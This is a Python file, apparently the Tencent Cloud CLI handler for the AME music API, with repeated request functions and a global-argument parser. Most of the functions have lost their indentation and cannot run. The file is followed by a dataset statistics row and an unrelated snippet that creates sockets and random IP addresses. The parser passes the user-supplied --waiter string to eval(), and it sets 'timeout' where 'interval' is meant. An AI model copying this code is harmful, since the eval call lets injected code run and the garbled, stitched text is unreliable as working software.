            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeMusicRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeMusic(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCloudMusic(args, parsed_globals):
    """Invoke the DescribeCloudMusic API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeCloudMusicRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeCloudMusic(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyMusicOnShelves(args, parsed_globals):
    """Invoke the ModifyMusicOnShelves API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyMusicOnShelvesRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.ModifyMusicOnShelves(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePkgOfflineMusic(args, parsed_globals):
    """Invoke the DescribePkgOfflineMusic API and print the JSON response.

    Builds credentials and an AmeClient from the global CLI options, sends
    the request built from ``args``, and optionally polls until the
    configured waiter condition holds.

    :param args: dict of action parameters for the request model.
    :param parsed_globals: parsed global CLI options.
    :raises ClientError: if the waiter exceeds its configured timeout.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential precedence: CVM role > STS assume-role > static secret keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
        )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribePkgOfflineMusicRequest()
    model.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribePkgOfflineMusic(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            # Some interpreters return bytes from to_json_string; decode first.
            json_obj = json.loads(result.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        # Hoist the waiter config; the original re-looked it up on every use.
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
            (waiter['expr'], waiter['to'], search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePackageItems(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePackageItemsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribePackageItems(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doTakeMusicOffShelves(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.TakeMusicOffShelvesRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.TakeMusicOffShelves(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doReportData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ReportDataRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ReportData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCloudMusicPurchased(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCloudMusicPurchasedRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeCloudMusicPurchased(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPutMusicOnTheShelves(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PutMusicOnTheShelvesRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.PutMusicOnTheShelves(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSearchKTVMusics(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SearchKTVMusicsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.SearchKTVMusics(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20190916": ame_client_v20190916,
}
MODELS_MAP = {
"v20190916": models_v20190916,
}
ACTION_MAP = {
"DescribeKTVMusicDetail": doDescribeKTVMusicDetail,
"DescribeItemById": doDescribeItemById,
"DescribeStations": doDescribeStations,
"DescribePackages": doDescribePackages,
"DescribeLyric": doDescribeLyric,
"DescribeMusicSaleStatus": doDescribeMusicSaleStatus,
"DescribeItems": doDescribeItems,
"DescribeKTVPlaylistDetail": doDescribeKTVPlaylistDetail,
"DescribeAuthInfo": doDescribeAuthInfo,
"DescribeKTVPlaylists": doDescribeKTVPlaylists,
"DescribeMusic": doDescribeMusic,
"DescribeCloudMusic": doDescribeCloudMusic,
"ModifyMusicOnShelves": doModifyMusicOnShelves,
"DescribePkgOfflineMusic": doDescribePkgOfflineMusic,
"DescribePackageItems": doDescribePackageItems,
"TakeMusicOffShelves": doTakeMusicOffShelves,
"ReportData": doReportData,
"DescribeCloudMusicPurchased": doDescribeCloudMusicPurchased,
"PutMusicOnTheShelves": doPutMusicOnTheShelves,
"SearchKTVMusics": doSearchKTVMusics,
}
AVAILABLE_VERSION_LIST = [
"v20190916",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
if os.environ.get(OptionsDefine.ENV_ROLE_ARN) and os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME):
cred[OptionsDefine.RoleArn] = os.environ.get(OptionsDefine.ENV_ROLE_ARN)
cred[OptionsDefine.RoleSessionName] = os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
elif not g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param.replace('_', '-') in [OptionsDefine.RoleArn, OptionsDefine.RoleSessionName]:
if param.replace('_', '-') in cred:
g_param[param] = cred[param.replace('_', '-')]
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["ame"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["ame"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
if g_param[OptionsDefine.Waiter]:
param = eval(g_param[OptionsDefine.Waiter])
if 'expr' not in param:
raise Exception('`expr` in `--waiter` must be defined')
if 'to' not in param:
raise Exception('`to` in `--waiter` must be defined')
if 'timeout' not in param:
if 'waiter' in conf and 'timeout' in conf['waiter']:
param['timeout'] = conf['waiter']['timeout']
else:
param['timeout'] = 180
if 'interval' not in param:
if 'waiter' in conf and 'interval' in conf['waiter']:
param['interval'] = conf['waiter']['interval']
else:
param['timeout'] = 5
param['interval'] = min(param['interval'], param['timeout'])
g_param['OptionsDefine.WaiterInfo'] = param
# 如果在配置文件中读取字段的值,python2中的json.load函数会读取unicode类型的值,因此这里要转化类型
if six.PY2:
for key, value in g_param.items():
if isinstance(value, six.text_type):
g_param[key] = value.encode('utf-8')
return g_param
| 51.687166 | 155 | 0.677754 | 6,268 | 57,993 | 6.048979 | 0.037013 | 0.09574 | 0.28614 | 0.123144 | 0.883344 | 0.876461 | 0.873137 | 0.868021 | 0.861849 | 0.856574 | 0 | 0.005102 | 0.188902 | 57,993 | 1,121 | 156 | 51.733274 | 0.800948 | 0.004845 | 0 | 0.764078 | 0 | 0 | 0.136805 | 0.069061 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021359 | false | 0 | 0.015534 | 0.000971 | 0.038835 | 0.019417 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c714f424f8dfd87a02c18685306ef83f2b8ce1c3 | 280 | py | Python | tool_module.py | hslee1539/p2p | c472271eff409ef345f29ef32f562a5f5e00d3ba | [
"MIT"
] | null | null | null | tool_module.py | hslee1539/p2p | c472271eff409ef345f29ef32f562a5f5e00d3ba | [
"MIT"
] | null | null | null | tool_module.py | hslee1539/p2p | c472271eff409ef345f29ef32f562a5f5e00d3ba | [
"MIT"
] | null | null | null | import random
import socket
def socketGenerator(count):
for i in range (count):
yield socket.socket()
def generateRandomIPAddress() -> str:
return "{0}.{1}.{2}.{3}".format(random.randint(1,255), random.randint(0,255),random.randint(0,255),random.randint(0,255))
